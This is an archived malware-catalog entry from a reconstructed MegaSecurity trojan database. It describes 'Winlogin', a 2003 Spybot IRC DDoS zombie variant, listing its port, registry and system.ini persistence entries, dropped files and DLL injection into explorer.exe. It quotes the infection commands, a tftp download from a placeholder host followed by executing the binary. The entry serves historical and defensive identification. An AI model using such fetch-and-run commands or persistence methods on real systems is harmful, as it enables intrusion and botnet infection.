Archive A Reconstructed © MegaSecurity Database
Winlogin
Released 22 years, 8 months ago. August 2003
Copyright © MegaSecurity
By ?
Informations
| Author | ? |
| Family | Winlogin |
| Category | Remote Access |
| Version | Winlogin |
| Released Date | Aug 2003, 22 years, 8 months ago. |
Additional Information
Server:
port: 113 TCP
startup:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce "winlogon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "NDplDeamon"
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run "winlogon"
c:\windows\system.ini, [boot] "shell"
added:
c:\WINDOWS\SYSTEM\winlogin.exe
c:\WINDOWS\SYSTEM\yuetyutr.dll (Backdoor.SdBot.au)
c:\WINDOWS\TEMP\vhbmhbze.txt
remarks:
A variant of the Spybot IRC DDoS zombie.
The trojan infects a system using the RPC/DCOM exploit shellcode.
It runs the following commands:
C:\WINNT\system32>tftp -i x.x.x.x GET winlogin.exe
C:\WINNT\system32>start winlogin.exe
C:\WINNT\system32>winlogin.exe
the dropped yuetyutr.dll is injected into the explorer.exe process by winlogin.exeThis archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.